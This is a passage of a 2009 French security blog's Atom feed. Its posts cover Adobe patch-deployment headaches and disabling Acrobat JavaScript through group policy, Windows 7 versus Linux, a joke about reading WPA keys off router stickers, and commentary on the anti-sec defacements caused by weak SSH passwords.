href="http://www.wired.com/politics/security/commentary/securitymatters/2008/03/securitymatters_0320"&gt;hacker mind&lt;/a&gt;&lt;/i&gt; (les autres voulant pour la plupart devenir chef de projet Java ou PHP).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il reste donc à savoir si l'Etat a les moyens de ses ambitions. Or si le peu de gens brillants et motivés qui restent quittent le pays pour trouver beaucoup mieux ailleurs, comme &lt;a href="http://news0ft.blogspot.com/2009/07/lechec-de-la-securite-francaise.html"&gt;mon précédent billet&lt;/a&gt; s'en faisait l'écho, cela ne me semble pas de bon augure.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;On m'objecte souvent que la majorité des excellents professionnels qui oeuvrent en France sont totalement invisibles. Ce qui est probablement exact, car j'ai déjà rencontré des gens dont le nom n'apparait pas une seule fois dans Google et dont les compétences ne peuvent pas être mises en doute. Mais alors, à quoi sont utilisées ces compétences ?&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;PS. Je ne rentrerai pas dans le débat sur les causes de l'échec de &lt;/span&gt;&lt;a href="http://fr.wikipedia.org/wiki/Multics"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Multics&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;, dont il est aussi question dans le message de "DC" :)&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3464642441257909816?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3464642441257909816/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3464642441257909816' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3464642441257909816'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3464642441257909816'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/09/message-aux-lecteurs-de-dc.html' title='Message aux lecteurs de DC'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-5172074337086499574</id><published>2009-08-24T08:00:00.002+02:00</published><updated>2009-08-24T19:02:58.141+02:00</updated><title type='text'>L'envers du décor</title><content type='html'>&lt;div&gt;Quand j'étais petit, je pensais que le problème de la sécurité était résolu (c'était plus facile à l'époque, il faut dire).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je mettais à jour ma machine dès que possible, je n'avais aucun port ouvert sur Internet, des mots de passe robustes, et un antivirus (déjà !). A l'époque les navigateurs ne posaient pas problème: l'historique de sécurité de &lt;a href="http://fr.wikipedia.org/wiki/NCSA_Mosaic"&gt;NCSA Mosaic&lt;/a&gt; est pour ainsi dire vierge :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Plus grand, je suis sorti d'école sans savoir rien faire et je suis donc devenu consultant en SSII (comme beaucoup de jeunes diplômés). J'ai ainsi pu distribuer des conseils à des gens qui semblaient persuadés que j'en savais plus qu'eux - ce qui était malheureusement probablement vrai (note: j'ai un billet sur le jeunisme dans l'informatique en préparation :).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Plus tard, j'ai pris en charge bénévolement l'administration du réseau informatique dans la TPE de ma femme. Avec de vrais utilisateurs complètement étrangers à l'informatique (sauf le commercial, qui a un Mac). Et là, j'ai commencé à voir l'envers du décor ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maintenir en sécurité - et donc à jour - un parc logiciel de taille même modeste relève de la gageure avec les outils logiciels qui nous sont proposés aujourd'hui par les éditeurs.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Microsoft facilite vraiment la tâche des administrateurs avec &lt;a href="http://update.microsoft.com/"&gt;l'installation automatique des correctifs&lt;/a&gt; pour tous leurs logiciels, avec ou sans &lt;a href="http://technet.microsoft.com/en-us/wsus/default.aspx"&gt;WSUS&lt;/a&gt;, et le &lt;a href="http://technet.microsoft.com/en-us/library/cc757936(WS.10).aspx"&gt;déploiement centralisé d'applications&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;De mon point de vue, la palme de l'horreur dans le domaine revient sans conteste aux logiciels Adobe (Acrobat Reader et Flash particulièrement, ainsi que &lt;a href="http://www.adobe.com/support/security/bulletins/apsb09-11.html"&gt;ShockWave&lt;/a&gt; récemment). Ces logiciels sont victimes de la combinaison des facteurs suivants:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Ils sont incontournables (Flash, toutes versions confondues, dépasse les&lt;a href="http://www.adobe.com/products/player_census/flashplayer/version_penetration.html"&gt; 99% de déploiement dans le monde&lt;/a&gt;).&lt;/li&gt;&lt;li&gt;Ils font l'objet de &lt;a href="http://www.adobe.com/support/security/"&gt;problèmes de sécurité&lt;/a&gt; récurrents.&lt;/li&gt;&lt;li&gt;Ils sont accessibles via un navigateur.&lt;/li&gt;&lt;li&gt;En conséquence ... ils sont ciblés par de &lt;a href="http://isc.sans.org/diary.html?storyid=6847"&gt;vraies attaques&lt;/a&gt; provenant d'Internet.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Se protéger nécessite au minimum de &lt;i&gt;mettre à jour&lt;/i&gt; et de &lt;i&gt;diminuer la surface d'attaque&lt;/i&gt; de ces logiciels.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En ce qui concerne la mise à jour, c'est la croix et la bannière. Le système de mise à jour automatique (intégré) nécessite d'être administrateur local du poste. Et l'utilisateur final doit prendre la décision de mise à jour, au travers d'une boite de dialogue - échec.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En ce qui concerne Flash, un &lt;a href="http://fpdownload.macromedia.com/get/flashplayer/current/licensing/win/install_flash_player_10_active_x.msi"&gt;fichier d'installation ".msi"&lt;/a&gt; est disponible, ce qui permet d'utiliser les fonctions natives de distribution logicielle dans Windows et de contourner les problèmes précédents.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ce qu'on sait moins, c'est que la distribution de ce fichier ".msi", même en entreprise, est soumise à &lt;a href="http://www.adobe.com/support/shockwave/info/licensing/faq.html"&gt;accord préalable et discrétionnaire de la part d'Adobe&lt;/a&gt; !&lt;/div&gt;&lt;br /&gt;En ce qui concerne Acrobat Reader, c'est l'enfer.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Les seules versions téléchargeables en format ".msi" sont les versions 9.1.0 et 8.1.3. Enfin je crois, car l'ergonomie du site Web d'Adobe laisse à désirer ... On peut passer &lt;a href="http://get.adobe.com/fr/reader/enterprise/"&gt;par ici&lt;/a&gt; ou &lt;a href="http://get.adobe.com/fr/reader/otherversions/"&gt;par là&lt;/a&gt; pour récupérer ces versions mais il existe peut-être des portes dérobées.&lt;br /&gt;&lt;br /&gt;Quand je dis ".msi", il faut comprendre une version compressée avec &lt;a href="http://www.nosltd.com/"&gt;NOSSO&lt;/a&gt; dans laquelle il est possible de trouver le ".msi" après &lt;a href="http://www.adobe.com/devnet/acrobat/pdfs/deploying_reader9.pdf"&gt;quelques manipulations&lt;/a&gt; (notez que la documentation d'installation d'Acrobat Reader est elle-même au format PDF :) ... Sans parler de la version anglaise d'Acrobat Reader, qui installe également &lt;a href="http://fr.wikipedia.org/wiki/Adobe_Integrated_Runtime"&gt;AIR&lt;/a&gt; si l'on n'y prend garde.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Au jour où j'écris ces lignes, les seules versions d'Acrobat Reader sans bogue connu et publié sont les versions 9.1.3 et 8.1.6. Pour arriver à ces versions, il faut télécharger des &lt;a href="http://www.adobe.com/support/downloads/product.jsp?platform=windows&amp;amp;product=10"&gt;correctifs au format ".msp"&lt;/a&gt;. Passons sur le sans-débit (&lt;= 56K) qui a récupéré une version d'Acrobat Reader sur un CD AOL: il ne peut pas être à jour sans télécharger presque 100 Mo de correctifs.  &lt;/div&gt;&lt;div&gt;L'organigramme d'application des susdits correctifs ne suit aucune logique. Certains correctifs nécessitent de disposer de la version N-1, d'autres peuvent être appliqués sur les versions N-1, N-2 ou N-3. Ce qui cause &lt;a href="http://forums.adobe.com/message/2155921"&gt;visiblement des problèmes&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Après avoir appliqué tous les correctifs et redéployé entièrement l'application, reste le problème de la défense en profondeur: &lt;i&gt;la désactivation de JavaScript dans Acrobat Reader&lt;/i&gt; (mesure conservatoire nécessaire mais non suffisante par les temps qui courent).&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Cette opération s'effectue dans la base de registre au travers de la clé &lt;b&gt;bEnableJS&lt;/b&gt;, dont l'emplacement exact varie d'une version d'Acrobat Reader à l'autre.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vous trouverez des &lt;a href="http://technet.microsoft.com/en-us/library/cc779567(WS.10).aspx"&gt;modèles d'administration&lt;/a&gt; (fichiers ".adm) "tout fait" sur Internet vous permettant de régler ce paramètre. Seul problème: une fois le fichier ".adm" chargé dans la &lt;a href="http://www.microsoft.com/windowsserver2003/gpmc/default.mspx"&gt;console de gestion des stratégies de groupe&lt;/a&gt;, aucun paramètre n'est visible ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je vous donne les trucs que personne ne documente (applicables au moins à Windows 2003 R2):&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Le &lt;i&gt;parser&lt;/i&gt; de fichiers ".adm" étant ce qu'il est, il faut obligatoirement terminer par un retour à la ligne (sinon le dernier caractère de la dernière ligne est omis).&lt;/li&gt;&lt;li&gt;Les clés de base de registre n'étant pas des sous-clés de "Software\Policies" ne sont pas affichées par défaut. Il faut changer le &lt;a href="http://technet.microsoft.com/en-us/library/dd759104.aspx#BKMK_MANAGED"&gt;filtre d'affichage&lt;/a&gt; dans la GPMC.&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;Ce dernier comportement s'explique par le fait que les modifications apportées ailleurs que dans "Software\Policies" sont permanentes (ce que Microsoft appelle le "tatouage" de la base de registre). A contrario, les paramètres gérés par une politique sont appliqués dynamiquement.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Tout ça pour qu'à l'ouverture d'un fichier PDF contenant un JavaScript, l'utilisateur se voie proposé de le réactiver "afin de bénéficier de toutes les fonctionnalités du document" ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/acrofail.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 462px; height: 163px;" src="http://newsoft.dyndns.org/blog/acrofail.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;Mais au moins, Acrobat Reader a l'avantage sur Flash (et sur FireFox, accessoirement) d'être configurable par la base de registre, et non par une saleté de fichier binaire ".sol" configurable uniquement en passant &lt;a href="http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager.html"&gt;par le site d'Adobe&lt;/a&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si j'avais un seul message à faire passer à Adobe, cela serait probablement "&lt;span class="Apple-style-span" style="font-style: italic; "&gt;&lt;a href="http://www.imdb.com/title/tt0145487/quotes"&gt;with great power comes great responsibility&lt;/a&gt;" ...&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Quant à moi j'en tire les conclusions suivantes:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://news0ft.blogspot.com/2009/07/la-preuve-que-la-securite-est-un-echec.html"&gt;La sécurité est un échec&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;Il est impossible d'être un bon auditeur sans être un excellent administrateur.&lt;/li&gt;&lt;li&gt;Personnellement, je désinstalle Flash à chaque annonce de faille pour être sûr de toujours récupérer la dernière version au moment où j'en ai vraiment besoin.&lt;/li&gt;&lt;li&gt;Et enfin, le réseau de ma femme est probablement plus sûr que celui des entreprises du CAC40 ... la sécurité est un échec, à nouveau !&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-5172074337086499574?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/5172074337086499574/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=5172074337086499574' title='8 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5172074337086499574'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/5172074337086499574'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/08/lenvers-du-decor.html' title='L&apos;envers du décor'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-6770960436380604447</id><published>2009-08-17T08:00:00.002+02:00</published><updated>2009-08-17T08:00:03.894+02:00</updated><title type='text'>Faut-il passer à Windows Seven ?</title><content type='html'>Très franchement, je n'en sais rien :) Mais la question se pose, puisque 2 personnes proches, n'ayant jamais acheté de logiciel auparavant, se sont payés un Windows Seven en précommande.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le système est disponible depuis le 7 août pour les abonnés &lt;a href="http://msdn.microsoft.com/en-us/default.aspx"&gt;MSDN&lt;/a&gt;/&lt;a href="http://technet.microsoft.com/en-us/default.aspx"&gt;Technet+&lt;/a&gt;. Il était même "dans la nature" quelques jours avant suite à une fuite (il ne serait probablement pas illégal vous donner le lien, vu que c'est la clé de licence qui contrôle tout, mais n'étant pas juriste je préfère m'abstenir :).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il est clair que la première impression est plutôt bonne: pas d'écrans bleus, système fluide sur du matériel d'il y a 2/3 ans, bonne ergonomie (moins de &lt;i&gt;prompts&lt;/i&gt; UAC, barre des tâches retravaillée), ... Il faut dire que depuis novembre 2006 (sortie de Vista sur MSDN), les constructeurs ont eu le temps de peaufiner leurs &lt;i&gt;drivers&lt;/i&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;L'objectif de ce billet est surtout de mettre l'accent sur un choix: soit vous restez sous Windows XP, soit vous passez à Windows Seven. Pour citer la &lt;a href="http://fr.wikipedia.org/wiki/Microsoft_Windows_Vista"&gt;page Wikipedia consacrée à Vista&lt;/a&gt;:"&lt;i&gt;Vista est considérée comme l'une des versions les plus &lt;a href="http://movb.blogspot.com/"&gt;calamiteuses&lt;/a&gt; de Windows&lt;/i&gt;". Et comme le dit un ami &lt;i&gt;&lt;a href="http://www.acklabs.net/blog/"&gt;risk manager&lt;/a&gt;&lt;/i&gt;, donc habitué des formules synthétiques: "le monde se souviendra de Windows Vista comme de &lt;a href="http://fr.wikipedia.org/wiki/Windows_Me"&gt;Windows ME&lt;/a&gt;".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Windows Seven offre le noyau et l'habillage graphique de Vista, les bogues en moins, et certaines &lt;i&gt;features&lt;/i&gt; en plus: &lt;i&gt;Direct Access&lt;/i&gt; (tunnel IPv6 équivalent à un VPN), mode Windows XP (basé sur Virtual PC), etc.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien sûr, tout n'a pas été corrigé. Il reste impossible d'importer une photo individuelle depuis un appareil photo numérique sans synchroniser tout le contenu. Il reste donc nécessaire d'avoir un appareil familial et un appareil porn^H^H^Herso (on peut en conclure que les développeurs Microsoft n'ont pas de famille, ou pas de relations sexuelles, au choix :).&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais aujourd'hui, démarrer une migration vers Vista ne fait plus aucun sens. D'autant que le dernier Service Pack est prévu pour 2010, et la &lt;a href="http://support.microsoft.com/lifecycle/?LN=en-us&amp;amp;p1=11734"&gt;fin de support&lt;/a&gt; &lt;i&gt;mainstream&lt;/i&gt; pour 2012.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Reste la question de la migration éventuelle vers Linux, comme &lt;a href="http://natisbad.org/"&gt;certains&lt;/a&gt; &lt;a href="http://chdir.org/~nico/blog/"&gt;collègues&lt;/a&gt; me le rappellent tous les jours.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Malheureusement, outre les arguments traditionnels en défaveur de Linux [*], ce système prend cher en ce moment [&lt;a href="http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html"&gt;1&lt;/a&gt;][&lt;a href="http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html"&gt;2&lt;/a&gt;][&lt;a href="http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html"&gt;3&lt;/a&gt;][&lt;a href="http://blog.cr0.org/2009/04/interesting-vulnerability-in-udevd.html"&gt;4&lt;/a&gt;]. Depuis que Google a décidé de s'en servir comme base pour &lt;a href="http://googleblog.blogspot.com/2009/07/introducing-google-chrome-os.html"&gt;ChromeOS&lt;/a&gt; (à moins que ce ne soit le projet &lt;a href="http://secsi.adullact.net/"&gt;SEC&amp;amp;SI&lt;/a&gt; qui ait tout déclenché :), ils se rendent compte que tout reste à faire en matière de sécurité, à commencer par sensibiliser le Chef de Patrouille (a.k.a. Linus). Pour paraphraser l'ineffable &lt;a href="http://archives.neohapsis.com/archives/dailydave/2009-q3/0061.html"&gt;Dave Aitel&lt;/a&gt;: "&lt;i&gt;Right now, Linux kernel security is 5 years behind Windows&lt;/i&gt;".&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Bien sûr, &lt;a href="http://www.google.fr/search?q=thomas+garnier+site:microsoft.com"&gt;Thomas Garnier&lt;/a&gt; nous avait démontré que le noyau Windows connait les mêmes problèmes. Mais depuis qu'il a été recruté par Microsoft, tout va mieux !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;PS. Avec la sortie de Seven (et 2008R2), Microsoft en a profité pour faire le ménage dans son stock de bogues (certains ont &lt;a href="http://www.f-secure.com/weblog/archives/00001749.html"&gt;plus de 2 ans&lt;/a&gt; !). Alors si vous avez dansé tout l'été, &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx"&gt;patchez&lt;/a&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms09-aug.mspx"&gt; maintenant&lt;/a&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style=" ;font-size:small;"&gt;[*] impossibilité de gérer de manière centralisée des parcs étendus, incompatibilité des applications professionnelles dominantes, coût de formation des utilisateurs et des exploitants exhorbitant, absence de socle logiciel stable (ex. pilotes graphiques), etc. Laissons le troll en paix :)&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6770960436380604447?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6770960436380604447/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6770960436380604447' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6770960436380604447'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6770960436380604447'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/08/faut-il-passer-windows-seven.html' title='Faut-il passer à Windows Seven ?'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-3177657152934754019</id><published>2009-08-07T08:00:00.000+02:00</published><updated>2009-08-07T08:00:00.424+02:00</updated><title type='text'>Casser du WPA comme l'élite</title><content type='html'>&lt;div&gt;Vous avez téléchargé la &lt;a href="http://www.remote-exploit.org/backtrack.html"&gt;BackTrack&lt;/a&gt;, mais vous n'avez toujours pas réussi à trouver la clé WPA de votre voisin ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vous avez appris le &lt;a href="http://www.nvidia.com/cuda"&gt;CUDA&lt;/a&gt;, mais vous n'avez toujours pas réussi à trouver la clé WPA de votre voisin ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Vous avez appris le VHDL, optimisé le placement/routage de votre &lt;a href="http://www.xilinx.com/products/virtex4/"&gt;Virtex-4&lt;/a&gt; à la main, mais vous n'avez toujours pas réussi à trouver la clé WPA de votre voisin ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et pendant ce temps, l'élite du hacking craque une clé WPA en 10 secondes avec 1 seul paquet ... 1 paquet pour trouver l'adresse MAC du client légitime, et une paire de jumelles pour lire la clé du voisin !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/LiveBoxPub.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 703px; height: 336px;" src="http://newsoft.dyndns.org/blog/LiveBoxPub.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic; "&gt;(Photo réalisée sans trucage - pour ceux qui n'ont pas l'habitude, il s'agit d'une LiveBox avec son sticker d'origine mentionnant la clé WPA)&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Comme quoi HADOPI a du bon: cette loi va opérer une sélection naturelle des gens qui conserveront le droit d'accès à Internet. La qualité globale du réseau ne peut que s'en trouver améliorée !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;PS. Pour les esprits chagrins qui lisent ce blog, s'il y en a: je n'utilise pas la connexion WiFi des voisins. D'ailleurs la clé WPA se trouve en dessous de la LiveBox et pas sur le côté :)&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-3177657152934754019?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/3177657152934754019/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=3177657152934754019' title='7 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3177657152934754019'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/3177657152934754019'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/08/casser-du-wpa-comme-lelite.html' title='Casser du WPA comme l&apos;élite'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-941139588723788717</id><published>2009-07-27T08:00:00.002+02:00</published><updated>2009-07-28T11:49:36.813+02:00</updated><title type='text'>La preuve que la sécurité est un échec</title><content type='html'>&lt;p&gt;Pour ceux qui ne lisent pas (ou plus) la liste de diffusion &lt;a href="http://archives.neohapsis.com/archives/fulldisclosure/"&gt;Full Disclosure&lt;/a&gt;, voici la version courte de l’histoire : un « groupe » se faisant appeler « &lt;a href="http://en.wikipedia.org/wiki/Antisec_Movement"&gt;anti-sec&lt;/a&gt; » lance une guerre totale contre les « &lt;em&gt;white hats&lt;/em&gt; » (les gentils hackers, si toutefois cela a un sens) et le « &lt;em&gt;full disclosure&lt;/em&gt; ». Une telle initiative refait surface de manière périodique, la dernière en date étant le « pr0j3kt m4yh3m » (tout un programme).&lt;/p&gt;&lt;p&gt;Comme preuve de leur motivation, ils ont saccagés quelques sites à forte visibilité : &lt;a href="http://astalavista.box.sk/"&gt;Astalavista&lt;/a&gt;, &lt;a href="http://imageshack.us/"&gt;ImageShack&lt;/a&gt; … le dernier en date étant la crème du &lt;i&gt;consulting&lt;/i&gt; américain en sécurité informatique : la société &lt;a href="http://www.matasano.com/"&gt;Matasano&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Cette histoire est emblématique à plusieurs titres.&lt;/p&gt;&lt;p&gt;Tout d’abord la réponse à « pourquoi la sécurité est un échec » se voit une n-ième fois confortée : toutes ces attaques sont basées sur la découverte d’un mot de passe faible par &lt;i&gt;brute-force&lt;/i&gt; SSH, n’en déplaise &lt;a href="http://isc.sans.org/diary.html?storyid=6742"&gt;à ceux qui pensaient&lt;/a&gt; avoir trouvé un « 0day » exploitable en préauth dans SSH sur un Linux 64 bits avec le patch GrSecurity appliqué …&lt;/p&gt;&lt;p&gt;N’oublions pas le cas de Twitter, qui aurait pu simplement &lt;a href="http://www.korben.info/hack-de-twitter-la-suite.html"&gt;« disparaitre » du Web&lt;/a&gt; à la suite de la compromission d’un mot de passe (heureusement que cette attaque était le fruit d’un individu isolé plutôt bien intentionné).&lt;/p&gt;&lt;p&gt;Ensuite &lt;a href="http://archives.neohapsis.com/archives/fulldisclosure/2009-07/0388.html"&gt;le cas de Matasano&lt;/a&gt; laisse songeur, surtout lorsqu’on voit que le même système est utilisé pour de l’hébergement Web, de la messagerie … et le stockage de données d’audit client (ex. « ISA Pen Test Availability_13_Feb.xls »).&lt;/p&gt;&lt;p&gt;La sécurité est un échec car personne, quel que soit son niveau de compétences et l’énergie investie dans l’administration de ses systèmes, ne peut prétendre être invulnérable. D’ailleurs vous ne m’entendrez jamais dire « &lt;em&gt;fu^H^H&lt;span class="Apple-style-span" style="font-style: normal; "&gt;&lt;em&gt;hack me I’m famous&lt;/em&gt; », car je sais trop bien que vous y arriveriez :)&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Des exemples ?&lt;/p&gt;&lt;p&gt;On lit dans la presse que divers réseaux de sensibilité extrême sont piratés (&lt;a href="http://www.boingboing.net/2007/09/03/us-officials-claim-c.html"&gt;DoD&lt;/a&gt;, &lt;a href="http://www.networkworld.com/community/node/38384"&gt;FAA&lt;/a&gt;, &lt;a href="http://www.msnbc.msn.com/id/28758856/"&gt;système de paiement&lt;/a&gt;, …). C’est bien sûr totalement invérifiable, mais crédible. Ayant eu l'occasion de m'intéresser à quelques réseaux sensibles vaguement connectés à Internet (&lt;a href="http://en.wikipedia.org/wiki/SITA"&gt;SITA&lt;/a&gt;, réseaux satellitaires, etc.), il s’avère qu’ils sont tous de même niveau de sécurité que le réseau bureautique moyen … l’expérience des attaques en moins !&lt;/p&gt;&lt;p&gt;Prenons quelques exemples publics et vérifiables :&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Le site « &lt;a href="http://www.culture.gouv.fr/culture/aimelesartistes/"&gt;j’aime les artistes&lt;/a&gt; ». Un(e) ministre ayant commis l’erreur de prétendre ce site inviolable, il a été immédiatement &lt;a href="http://www.zataz.com/news/18715/j-aime-les-artistes--piratage.html"&gt;mis hors d’usage&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;La société « &lt;a href="http://www.extelia.fr/"&gt;Extelia&lt;/a&gt; ». Après avoir gagné l’appel d’offres HADOPI, cette société et tous ses sites clients &lt;a href="http://www.korben.info/extelia-hadopi.html"&gt;ont immédiatement été 